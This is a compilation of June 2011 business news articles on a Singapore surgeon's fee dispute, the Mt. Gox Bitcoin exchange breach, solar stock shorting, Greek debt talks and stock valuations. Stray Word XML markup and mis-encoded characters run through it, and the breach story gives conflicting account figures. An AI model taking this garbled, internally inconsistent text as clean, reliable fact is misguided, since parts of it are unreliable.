Policy European Financial Crisis International Finance Small Business Financing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04:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/european-finance-chiefs-fail-to-agree-on-greek-aid-payment.html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Royalty's $20 Million Bill May Thwart Singapore Medical Ambition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8:16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Ma Picks Wu for Running Mate as Taiwan Opposition Support Grows Karzai Says U.S. Holding Talks With Afghan Taliban Guerrillas Emerging Stocks Fall to 3-Month Low on Greece, Technology Tumble Rice May Drop as FAOБ─(tm)s Calpe Predicts Abundant World Supply Asia Housing Boom Stalls as Tightening Puts Brake on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Andrea Tan and Simeon Bennett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It's a S$24.8 million ($20 million) medical bill that shocked oil-rich Brunei and may hinder Singapore's bid to become a top medical-tourist destination.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Susan Lim, Asia's first liver-transplant surgeon, sought as much as S$200,000 a day over seven months in 2007 to treat a member of Brunei's royal family who later succumbed to cancer. The bill sparked a complaint from Brunei, a Singapore investigation and an inquiry into her fees.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"Reputations are tarnished at all levels" with such scandals, said Josef Woodman, who spent more than five years researching medical tourism and is the author of Patients Beyond Borders, a guide to finding offshore medical treatment. "This underscores the need for improved oversight and regulations that would help to prevent abuses."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Brunei case and another complaint from the United Arab Emirates accusing a group of Singapore doctors, including Lim, of overbilling may hamper the state's ambition to attract more foreign patients in Asia's $5.5 billion medical-tourism market. Heart-bypass surgery in Singapore costs about a sixth of that charged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 denied any wrongdoing and in e-mailed responses said the Bruneian patient had agreed to the charges.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patient was never held to ransom," Lim said. "She was willing to pay the price we had agreed to."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Malaysia, Thailand and South Korea are among countries competing with Singapore for a slice of the industry, said Pawel Suwinski, a health care analyst at Frost &amp; Sullivan Ltd.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‘Losing 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is losing ground to cheaper countries and is evolving into a hub for complex surgeries," said Wei Siang Yu, who owns Fly Free For Health, a Singapore-based medical concierge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Brunei is ruled by Sultan Haji Hassanal Bolkiah, the second-richest royal in the world, according to Forbes. The country's health ministry sought a discount through its counterpart in Singapore on Lim's S$24.8 million bill for treatment of Pangiran Anak Hajah Damit, the Sultan's sister-in- law, claiming the "extravagant" charges could harm the reputation of Singapore's medical profession.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 had voluntarily cut Damit's original bill to S$12.1 million including S$3.3 million for a team of doctors and nurses, according to court papers. The amount covered "extraordinary" services including setting up medical facilities in hotel suites and "round the clock devotion," to the patient, her lawyers from Rajah &amp; Tann LLP said in the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‘Gesture of Friendship'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 56, married to Citigroup Inc. private bank Chairman Deepak Sharma, said in the e-mail she reduced the bill "as a gesture of friendship." She said the perception she cut the cost to avoid professional misconduct charges is untrue.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Singapore's health ministry began a probe in 2007 to determine whether Lim's bills showed a pattern of overcharging, improper billing and whether some fees were inappropriate for services done by other doctors. A panel appointed by the medical council to hold the inquiry stepped down after Lim complained the members had prejudged her case. A second panel is now pursuing the investigation.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 failed to block the second hearing when the city's high court ruled on May 26 that it could proceed. Lim has until June 27 to appeal.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from the medical council declined to comment for this story, referring to a May 26 statement that said the council will continue to take all steps to ensure "a full, fair and timely hearing of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‘Minimal Impact'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Health Ministry officials referred inquiries to the city-state's tourism board, which said Lim's case had "minimal impact" on the island's medical tourism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Lim's case has renewed calls for medical fee guidelines in Singapore to be reinstated. The Competition Commission of Singapore had rejected the proposal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who are coming in for medical tourism would like to ensure that the clinics and doctors are credible and have some certainty of their expenses before even making the trip," said Janson Yap, the Southeast Asia head of life sciences and health care at Deloitte LLP. "Having guidelines would be helpful."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antitrust regulator said more effective measures include the health ministry's requirement for itemized medical bills and hospitals providing financial counseling for patients.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‘Technically Bankrupt'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controversy over the Brunei bills resulted in a loss of new patients and other businesses being put on hold, Lim said. Her medical practice is now "technically bankrupt" and if not for a loan she and her family provided would have shut down,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her medical practice plunged to S$11.6 million, based on 2008 financial statements, from S$103 million two years earlier,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earned S$940 million from medical tourism last year, according to the tourism board, which has a goal of 1 million medical tourists by 2012. A group of doctors and investors is building an S$800 million integrated private hospital, medical center and hotel to attract more foreign patients.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Asian nations have their own initiatives.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Thailand, whose King Bhumibol Adulyadej is the world's richest royal, has a five-year plan to double revenue from foreign patients by 2014. Malaysia has eased health-care advertising guidelines and offers tax breaks to hospitals serving foreign patients.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‘Perfect Destination'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home to the Taj Mahal, says it's a "perfect destination" for medical tourism, combining health treatments using the latest technology and visits to "some of the most alluring and awe-inspiring places of the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heart bypass costs $10,000 in India, $20,000 in Thailand and $23,000 in Singapore, according to data from Deloitte. The same surgery costs $44,000 in Dubai and $130,000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list prices appear higher in Singapore than in other Asian countries, final bills are often comparable due to shorter hospital stays," said Tan Yen Nee, deputy director of enrichment at the Singapore tourism board.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only had two or three patients seek care in Singapore over the last three or four years," said David Boucher, president of Companion Global Healthcare Inc., a Columbia, South Carolina-based medical tourism facilitator that sends about 25 employees of U.S. companies to Asia each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go to Bumrungrad Hospital Public Co. in Thailand, Boucher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Bangkok's Bumrungrad treated 30 percent more patients from Singapore between January and April compared with a year earlier, triple the hospital's overall growth rate, said Kenneth Mays, the marketing director at the hospital.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Dispute Settled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Arab Emirates' Health Ministry settled a billing dispute with Singapore in 2008 after the fees to about 100 UAE patients were halved to S$17.2 million, according to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Lim had said Damit agreed to her charges of S$100,000 to as much as S$200,000 a day, according to court papers. The Brunei Health Ministry said it wasn't aware of such an arrangement.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Singapore's medical fees still are significantly lower than charges patients face in London or Dubai, said Moza Juma Mattr, a Dubai citizen who visits Lim twice a year for treatment. The allegations against Lim haven't dissuaded Mattr, who spoke in Lim's clinic where one wall is lined with pictures of the surgeon posing with past U.S. presidents including Jimmy Carter and Bill Clinton.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shocked by the complaints against Susan," said Mattr, wife of Mohammed al-Gergawi, United Arab Emirates' Minister for Cabinet Affairs. "I don't believe that a smart woman like Susan will destroy her reputation and Singapore's."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Adi Narayan in Mumbai. Editor: Joe Schneider, Lars Klemming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Andrea Tan in Singapore at atan17@bloomberg.net; Simeon Bennett in Singapore at sbennett9@bloomberg.net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Douglas Wong at dwong19@bloomberg.net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The Singapore Exchange (SGX) American Medical Association Medical Devices LinkedIn Gates Foundation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04:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/royalty-s-20-million-bill-may-thwart-singapore-medical-ambition.html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Inside the Mega-Hack of Bitcoin: the Full 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loses database; exchanges close after 500,000 coins are missing or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storm had been building for over a week now. Last Monday at around 5 p.m. 25,000 Bitcoins were transferred from 478 accounts on the currency's largest exchange - Mt. Gox. But that was just the beginning. Now Mt. Gox is admitting to a major breach and has shut down, in an unprecedented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What Are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a peer-to-peer cryptocurrency.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Invented in 2009 by a shadowy Japanese figure - Satoshi Nakamoto - the coins promise a degree of anonymity against casual tracking attempts (though insecure practices, or more concerted government efforts could still breach your anonymity. Bitcoins are also popular because they do not rely on any one central financial authority and thus represent an anarchistic/nation agnostic financial system of sorts.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seed the market with Bitcoins, the brains behind the project created the concept of "mining" coins - devoting computing resources to finding "blocks" of Bitcoins. Today millions of coins have been "mined" and some people accept Bitcoins as a means of payment, showing that the currency has taken its first steps towards legitimacy.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Likewise, Bitcoins are traded on a number of currency exchanges, the largest of which is Mt. Gox. Mt. Gox allows for the trade of Bitcoins to and from U.S. dollars. The exchange accounts for over 90 percent of Bitcoin trading volume on an average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A Volatile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month the Bitcoin market has exploded, with the currency rising in value from around $1 USD per Bitcoin to around almost $30 USD per Bitcoin at its peak. Bitcoins were expected to slowly deflate over time, but this sudden rise was highly unusual - and unexpected.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chalked it up to misleading media reports which claimed Bitcoin to be a "totally anonymous" currency which could be used to safely "buy drugs" without fear of prosecution (this is expressly not true). Regardless of the source of the interest, the public was becoming interest in Bitcoins and the market was booming.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two Fridays ago the market began a downward plunge, with the price per coin falling nearly in half. Much like the rise, there were no hard at fast explanations for the fall, though speculative theories abounded.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recovered slightly last week, but the level of volatile was alarming as virtually no currency in history had ever seen these kinds of swings.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couple weeks the currency had risen 30-fold in value. And in just two days it had fell in half, returning to about 14-times the May value.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Accounts Breached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couple weeks people began to claim their accounts had been hacked and their Bitcoins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at around 5 pm, 25,000 bitcoins were transferred into account "1KPTdMb6p7H3YCwsy FqrEmKGmsHqe1Q3jg". The coins in question came from 25,000 accounts. Given recent trading values, that would indicate the counts were worth somewhere between $375,000 and $500,000 USD.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Gox's support team insisted such claims were isolated. "Magical Tux" a Tokyo-based member of the support team wrote on Saturday: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 we've been seeing a "lot" of cases recently.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I have 10 known cases of people whose coins were stolen (someone logged in on the account using their password, traded USD for BTC, withdrew all the BTC). Considering we have now over 60000 accounts (2 months ago we had 10 times less), this seems to be a problem coming mainly from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Problem is many have been posting in various places (forums, reddit, twitter, irc, etc) causing a lot of fear among users when the problem is still fairly limited.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Responding to commenters upset about the 25k Bitcoin heist, he comments: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I already replied you, your funds were stolen by someone logging in onto your account with your password. Your funds are right now on a bitcoin address and have not moved since then.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reminder we assume no responsibility should your funds be stolen by someone using your own password.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>... The coins stolen from Mt.Gox were not stolen using any CSRF exploit... [the thieves] logged in on users account using the correct login and password. We have logs showing the loggin succeed on first try.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Mt. Gox's carefree attitude over account theft (e.g. if you lose your password it's your only fault) would only last so long, though. Because a much worse breach was coming.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"Tango Down" - Mt. Gox Closes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weeks, we suggested that the Bitcoin markets cooperate to close trading in cases where extreme volatility (deflationary or inflationary) was observed. Many Bitcoin proponents did not take kindly to this suggesting, saying that closing currency exchanges for market events would be blasphemy and the antithesis of everything the market stood for.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Writes DailyTech user "whitslack":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of shutting down the Bitcoin exchanges when they heat up is just as repugnant to the central idea of Bitcoin as central banks are. Markets do get emotional at times, but that is something we all understand and accept. Shutting down a market is an artificial move that is in opposition to the concept of a free market. If an exchange took up such a policy, it would only incentivize the creation of new exchanges without such an artificial policy. If I can't trade my Bitcoins on Mt. Gox because it has "shut down," I'll simply go to another exchange that hasn't shut down. Even if all the currently existing exchanges colluded to shut down together, they would simply be granting enormous leverage for a newcomer to take all their volume. The concept of artificial market limits has no place in a free economy and cannot stand in one.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Well, friends, Mt. Gox has shut down. On Sunday at about 4 p.m., site official "Mark Karpeles" wrote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will be back to around 17.5$/BTC after we rollback all trades that have happened after the huge Bitcoin sale that happened on June 20th near 3:00am (JST).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should be back by June 20th 11:00am (JST, 02:00am GMT) with all the trades reversed and accounts available.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account with a lot of coins was compromised and whoever stole it (using a HK based IP to login) first sold all the coins in there, to buy those again just after, and then tried to withdraw the coins. The $1000/day withdraw limit was active for this account and the hacker could only get out with $1000 worth of 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this no account was compromised, and nothing was lost. Due to the large impact this had on the Bitcoin market, we will rollback every trade which happened since the big sale, and ensure this account is secure before opening access again.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 REGARDING LEAKED ACCOUNT INFORMATIONS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address this issue too and prevent logins from each users. Leaked information includes username, email and hashed password, which does not allow anyone to get to the actual password, should it be complex enough. If you used a simple password you will not be able to login on Mt.Gox until you change your password to something more secure. If you used the same password on different places, it is recommended to change it as soon as possible.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Several other major Bitcoin exchanges including TradeHill (closed at $13.79 USD per Bitcoin) have stopped showing financial transactions that recently occurred indicating a possible shutdown (though the site Bitcoin Charts reports more recent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What is Known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it is clear that the Mt. Gox database has been stolen. According to one source the database had 61,020 entries - roughly in line with Mt. Gox official MagicalTux's previous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an hour of the hack, reportedly 100,000 Bitcoins were sold at incredibly cheap rates on Mt. Gox, plunging the market from around $17.50 USD per Bitcoin to just $0.01 per Bitcoin. Meanwhile 400,000 other Bitcoins were reported missing.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the same time an unknown party also posted a Pastebin commenting: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hacked into mtgox database. Got a huge number of logins password combos.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Mtgox has fixed the problem now. Too late, cause I've already got the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sell the database for the right price.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Send your offers to: gfc06@hotmail.com Soon after, though the actual database dump was public posted. It's available (for now), via direct download from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MagicalTux Mt. Gox's current protection scheme was to use and MD5 hash on passwords in its database, along with a salt [source]. However, he did not specify whether a single salt was applied to all user passwords, multiple periodic salts, or whether user-specific unique salts were employed.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have reportedly been traced to a Hong Kong IP, according to sources. Of course this could simply be a hijacked server or a proxy server, which the hackers used to obfuscate their true location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some sources are reporting that the salting was not initially used and approximately 1,600 passwords appear unsalted. Cracking unsalted MD5 hashes is a pretty elementary task with rainbow table or brute force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salted passwords could be cracked, given the strength of the salting scheme and how much effort malicious parties put in (the expense in computing time likely wouldn't be worth the Bitcoin payoff - of course, if you were using hijacked machines, it's "free labor" anyways.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Mt. Gox forums users openly mocked the admins and expressed frustration at the site's security practices. Writes one user "Man From The Future": The fact that it uses MD5 is an issue.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should definitely have been set up using SHA256/SHA512, and at least a per user salt(You haven't clarified as to whether it's the same for all, unless I've misread something). Or even double SHA512 two-unique-salts halved.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stated in the press release the exchange says it's undoing the sell transactions currently and is working to restore the market to around $17.50 USD per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 What's Next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the massive breach may not be enough to kill the Bitcoin movement. After all, many people are very dedicated and enthusiastic about the concept of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 recent volatility, combined with this breach raise serious doubts about Bitcoin managing to become mainstream. The fact that the largest exchange in a $130M USD would practice such lax security practices such as failing to use the state of the art hashing methods to protect its database seems disturbing.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a greater underlying problem may be the vulnerability of users' local "wallet" file, wallet.dat. When news of the original Bitcoin hack broke, many assumed that malicious users had infected victims' computers and exposed their wallet.dat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serious Bitcoin aficionados encrypt their wallet.dat file soundly, but as casual interest in Bitcoins explodes, the question remains whether the average, security-ignorant user will practice similar safety precautions.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security firm Symantec reports finding a Trojan malware program titled Infostealer.Coinbit in the wild, which tries to extract the contents of your wallet and email it to a malicious party. The firm found code being shared on forums to similarly snatch wallet data and upload it via FTP.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long run encrypting your wallet file may not be enough.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Sophisticated hackers may copy the file to a remote location for rainbow tables attacks, or opt for a local on-system brute force attack. Either way, if your encryption scheme or password are weak, your wallet still may be compromised.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 also warns that botnets participating in Bitcoin mining could be netting the owners over $100,000 USD a month in profit.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of virtual currency has been one that has long excited.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>Cybercurrency was a focus of famous science fiction writer Neal Stephenson's 1995 postcyberpunk novel The Diamond Age: Or, A Young Lady's Illustrated Primer, in which digital cryptocurrency was mentioned as a driving force that eliminated the nation state by destroying their ability to collect taxes from citizens. Mr. Stephenson attacked the topic again in his 1999 book Cryptonomicon, in which protagonist search for gold to use as a basis of a digital cryptocurrency.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one such implementation of this ambitious concept has finally arisen, it's easy to wonder whether Mr. Stephenson could have predicted the future, much as William Gibson predicted the future of the internet, in many ways, with his seminal 1984 cyberpunk work Neuromancer.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order for Bitcoins to truly be a legitimate international currency, there's a lot of work that must be done to improve and protect the technology. In short, it's been a very bad week for Bitcoins; one can only hope this is the last bad news we hear.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Sunday June 19, 2011 7:15 p.m.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TradeHill has officially closed, posting the notice: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TradeHill has recently learned that a large number of user accounts at a competing Bitcoin exchange have been compromised. Because of the possibility that our users may have used the same password on multiple exchanges, we will be halting the ability to trade or withdraw funds for a few hours. We hope this will give all of our users time to reset their passwords if needed. You can reset your password by clicking on your username in the upper right of the website. This merely a precaution, and we do not have any evidence that our site has been compromised in any way. More info soon.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>We will update as more information becomes available.</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2011.06.20 03:17</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.dailytech.com/Inside+the+MegaHack+of+Bitcoin+the+Full+Story/article21942.htm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Shorts Exit ‘Solarcoaster' as Chinese Glut Sinks Panel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7:18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Japanese, Australian Stock Futures Rise on Greece, U.S. Economy China Existing Home Market Cools in May Amid Government Curbs Stocks Rise, Euro Strengthens on Greece Optimism; Oil Sinks MBIA-BofA, Credit Suisse, Bayer, Microsoft in Court News Hutchison Nordic Phone Unit to Stay Independent, Ramel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Ben Sills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Short sellers are flocking to solar power, dumping record levels of stock in First Solar Inc. of the U.S. and competing equipment makers in a bet that profit will be hurt by a glut of Chinese panels and shrinking demand in Europe.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Solar of Tempe, Arizona, the world's largest maker of thin-film solar panels, had a record 23 percent of outstanding shares sold short this month, according to Data Explorers information on Bloomberg. A record 54 percent of Germany's Q- Cells SE is short, meaning the stock was borrowed for sale by speculators who hope to buy it back later more cheaply.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surge in Chinese competition and solar subsidy cuts in the world's biggest markets of Germany and Italy have attracted short sellers and helped push down the 37-member Bloomberg Global Leaders Solar Index by 22 percent this quarter. The drop reflects a 21 percent price decline this year for solar cells, the devices that are fastened onto panels to convert sunlight into power, according to Bloomberg New Energy Finance.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stocks look cheap, but 2012 still has massive and potentially overwhelming challenges," said Shawn Kravetz, chief executive officer of Esplanade Capital. The Boston-based hedge fund has bought Chinese manufacturers and shorted their European competitors, he said, without naming stocks sold short.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for First Solar declined to comment. Thalheim- based Q-Cells did not respond to e-mails or calls.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Kravetz said his colleagues who've invested in solar stocks for seven years call the industry a "solarcoaster" because of price volatility. The 37- member Bloomberg solar index has a 60- day volatility of 24 percent, or twice the 12 percent rating of the Standard &amp; Poor's 500 Index, according to data on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Evergreen, Suntech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all out-of-favor stocks are heavily shorted. The solar index's biggest decliner this quarter, down 56 percent since March 31, is Evergreen Solar Inc. of Marlboro, Massachusetts, though just 15 percent of its shares were held short as of June 15, the most recent day Data Explorers data was provided. Ten stocks on the index have been shorted more heavily, including four Chinese manufacturers - Trina Solar Ltd., LDK Solar Co., Yingli Green Energy Holding Co. and Suntech Power Holdings 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Italy and Germany slowed development of solar projects, China's JA Solar Holdings Co. and Suntech, the world's biggest solar-cell makers by capacity, were leading an industry-wide expansion of factory capacity that will add at least 9.5 gigawatts of new manufacturing lines this year. That will boost global capacity to 41.5 gigawatts, outstripping demand of no more than 28 gigawatts forecast by New Energy Finance.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all this capacity added right ahead of the two biggest markets showing a significant slowdown, that's why we have a tremendous collapse," said Gordon Johnson, a solar analyst at Axiom Capital Management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Comparison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solar index already lost 25 percent since reaching a 13-month high on Feb.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installations of photovoltaic devices doubled last year as developers rushed to hook up equipment in Germany before the government lowered incentives. New plants still may increase by about 30 percent this year as the cost of solar energy drops to near the rate consumers pay for power from the national grid in some of the sunniest parts of California and Turkey.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made Charles Yonts, a solar analyst at CLSA in Hong Kong, optimistic that the industry can work through its inventory without suffering additional declines.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worst has passed for demand, but now it's a question of working through the inventory and that's difficult," said Yonts, who recommends investors buy Trina Solar and Trony Solar Holdings Co. of Hong Kong. "Prices have fallen so much that returns are now attractive."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Christopher Martin in New York and Marc Roca and William Lim in London. Editors: Todd White, Reed Landberg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Ben Sills in Madrid at bsills@bloomberg.net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Reed Landberg at landberg@bloomberg.net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Short Selling Foreclosure Crisis Oil Prices Steel Prices Short Sales Vs. Foreclosure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03:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/shorts-exit-solarcoaster-as-chinese-glut-sinks-panel-prices.html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G-7 Holds Call During Euro-Area Talks on Resolving Greek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7:13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 May Withhold Half of Greek Payment to Pressure Athens Euro Finance Chiefs Unlikely to Reach Greek Aid Plan Today Reynders Raises Prospect of Deal on EU6 Billion Greek Payment ECBБ─(tm)s Trichet Says Widening Imbalances Challenge Policy Makers EU Ministers Set to Clear Way for Greek Payment, Germany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Rebecca Christie and Mark Deen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Group of Seven officials conferred by telephone during a meeting of euro-area finance chiefs in Luxembourg to discuss resolving Greece's debt crisis, a U.S. official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 declined to disclose the content of the call and spoke on condition of anonymity in line with government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meeting began yesterday and continued into this morning.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Rebecca Christie in Luxembourg at rchristie4@bloomberg.net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Patrick Henry at phenry8@bloomberg.net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European Financial Crisis Call Center Optimization Corporate Pension Crisis Foreclosure Crisis Exchange-Traded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03:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/g-7-holds-call-during-euro-area-talks-on-resolving-greek-crisis.html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Declines as Greece Government Debates Confidence Motion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7:05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Greek Default Would Spell Б─≤HavocБ─(tm) for Banks a Year After Bailout Euro Strengthens as Germany Signals Compromise on Greek Crisis Euro Strengthens After Merkel Agrees to Greek Debt Compromise Euro Declines After Juncker Says Greece Progress Б─≤DifficultБ─(tm) Euro Declines Versus Yen on Concern Greece Debt Crisis Worsening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Candice Zachariahs and Kristine Aquino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euro fell against the dollar and yen as Greek Prime Minister George Papandreou fended off calls for elections from opposition parties in parliament.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common currency declined versus 12 of its 16 most- traded counterparts before the government resumes debate on a confidence motion, spurring concern over the stability of Greece's government. The greenback strengthened against the currencies of Australia and New Zealand as investors bought safer assets.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inclination would be to sell into euro rallies," said Sean Callow, a senior currency strategist at Westpac Banking Corp. in Sydney. "We're not at all convinced that Greece has the political will to deliver everything that its lenders want from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fell to $1.4272 as of 7:29 a.m. in Tokyo from $1.4306 in New York on June 17. The shared currency declined 0.2 percent to 114.33 yen. The dollar traded at 80.09 yen from 80.05.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Nate Hosoda, Jonathan Annells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Candice Zachariahs in Sydney at czachariahs2@bloomberg.net Kristine Aquino in Singapore at kaquino1@bloomberg.net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Rocky Swift at rswift5@bloomberg.net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Greece's Economy Health Care Reform Options Trading Exchange-Traded Fund Human Rights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03:14</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="19"/>
        </w:rPr>
        <w:br/>
        <w:t>http://www.businessweek.com/news/2011-06-19/euro-declines-as-greece-government-debates-confidence-motion.html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Stocks Cheapest in 26 Years as S&amp;P 500 Falls, Earnings Rise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7:25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Greek Default Would Spell Б─≤HavocБ─(tm) for Banks a Year After Bailout U.S. Stocks Rise to Prevent Longest S&amp;P 500 Slump Since 2001 FalconeБ─(tm)s LightSquared, Sprint Agree to 15-Year Network Accord U.S. Stocks Snap Six-Week Decline on Greece Optimism, Economy Stocks Rise, Euro Strengthens on Greece Optimism; Oil Sinks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Alexis Xydias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For the second time since the bull market began, profits are surging and stocks are falling.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Standard &amp; Poor's 500 Index companies will earn 18 percent more this year than in 2010, according to the average estimate of more than 9,000 analysts compiled by Bloomberg. Higher profits haven't stopped the gauge from falling 6.8 percent since April 29, pushing valuations to the cheapest levels in 26 years. Even if companies posted no growth, price-earnings ratios would be lower than on 96 percent of days in the past two decades.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of China raising interest rates, concerns about a Greek default and the end of the Federal Reserve's $600 billion stimulus program have almost wiped out this year's gains. The divergence between profit forecasts and economic indicators shows the challenge to investors after the S&amp;P 500 gained 88 percent from a 12-year low in March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is not willing to pay for future growth," said Nigel Holland, who helps oversee $516 billion at Legal &amp; General Group Plc in London. "Provided there is better data, it will stabilize," he said. "The market probably has room to rise 10 percent by year-end."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climbed less than 0.1 percent to 1,271.50 last week, snapping its longest retreat since 2008, after reports on jobless claims, retail sales and Chinese industrial production exceeded economists' forecasts and German Chancellor Angela Merkel retreated from demands that bondholders be forced to swallow losses in a Greek rescue.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Equities also got a boost as retailers Best Buy Co. and Kroger Co. said they would match or exceed predictions for 2011 income. The advance pared the S&amp;P 500's loss from its 2011 peak of 1,363.61 on April 29 to 92.11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Longest Streaks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34 days, the decrease is the second longest since the bull market began. The 16 percent tumble from April to July 2010 lasted 49 days, Bloomberg data show. This year's retreat has coincided with a decline in predictions for 2011 gross domestic product growth to 2.6 percent from 3.2 percent, according to the median estimate of 83 economists surveyed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Losses since April have pushed the price of the S&amp;P 500 to 14.5 times the past year's earnings, compared with the average of 20.5 since June 1991, according to Bloomberg data. The gauge is valued at 8.7 times cash flow, cheaper than in 81 percent of occasions since 1998. The gauge is priced at 2.1 times book value, or assets minus liabilities, lower than it has traded 90 percent of the time since 1995.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Excessive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in the assumption that earnings growth is zero, valuations would not be excessively high," said Patrick Moonen, who helps manage $537 billion at ING Investment Management in The Hague, Netherlands. "We are below consensus in the estimated earnings growth, and still think the corporate momentum is very strong."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Disappointing reports since May on housing, employment and manufacturing have heightened concerns that $600 billion in Treasury purchases by the Fed have failed to bolster growth. The S&amp;P 500 posted its biggest weekly decline since August in the period that ended June 3 after the U.S. jobless rate unexpectedly climbed to 9.1 percent and payrolls expanded at the slowest pace in eight months. A report from the Institute for Supply Management on June 1 showed that manufacturing expanded at the lowest rate in more than a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of insuring against defaults on Greek, Irish and Portuguese government debt surged to records last week on concern governments will fail to impose spending cuts needed for a European Union debt restructuring.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Swaps Soar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Credit-default swaps on Greece soared as much as 459 basis points to 2,237 on June 16, according to CMA prices, meaning it cost more than 2 million euros ($2.9 million) a year to insure 10 million euros worth of the nation's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traded at 1,932.75 basis points as of 4:30 p.m. in London on June 17 as Merkel backed down from her demands and said she'd work with the European Central Bank to avoid market disruptions.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are concerned about slowing growth in the U.S. and Europe's sovereign debt crisis at the same time policy makers in China, the world's second-largest economy, are trying to cool expansion. The country's central bank has raised the reserve-requirement ratio for lenders 11 times and boosted interest rates four times since the start of 2010 to keep inflation in check.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are boosting profit forecasts even with the global economy showing signs of weakness. S&amp;P 500 earnings may rise to $99.61 a share in 2011 from $84.58 last year and $61.52 in 2009, according to data compiled by Bloomberg. That's an increase from the forecast of $95.37 on Jan. 3 and $98.70 on April 29, the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Lehman, 1980s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Should stocks stay at current prices and the analyst prediction come true, the S&amp;P 500 would trade at 12.8 times income on Dec. 31, the lowest level since 1985 except for the six months after Lehman Brothers Holdings Inc.'s bankruptcy in September 2008 and nine months in the late 1980s, according to Bloomberg data. Companies in the S&amp;P 500 are forecast to earn $24.31 this quarter, up from $24.16 at the start of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 the slowdown will lead to another recession will weigh on stocks even as companies report higher income, said Doug Cliggott, Boston-based equity strategist at Credit Suisse Group AG. He said the S&amp;P 500 will be little changed through year-end.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wouldn't put the market now as extremely rich or in a sense extremely attractively valued," Cliggott said in an interview on Bloomberg Television's "InsideTrack" with Deirdre Bolton on June 13. "Price-earnings multiples will be at or below their historical averages because of all the uncertainties on future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Help From Fed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 may also have to do without more stimulus from the Fed, which will complete its second round of Treasury purchases this month. While Fed Chairman Ben S. Bernanke said during a June 7 speech in Atlanta that record monetary stimulus is still needed to boost the "frustratingly slow" U.S. economic recovery, he gave no indication that the central bank will start a third round of so-called quantitative easing.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Retreats in the S&amp;P 500 that exceed 5 percent are common during bull markets, according to data from Birinyi Associates Inc., the Westport, Connecticut-based money manager and research firm. During the nine rallies between 1962 and 2007, the S&amp;P 500 fell that much an average of seven times, the data show. The index has posted nine such retreats during the current advance.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investors increased their cash holdings to the highest level in a year this month as hedge funds slashed the amount of borrowed money invested in stocks, a survey from Bank of America Corp.'s Merrill Lynch unit showed on June 14.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Backbone'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"Valuation is a strong backbone," ABN 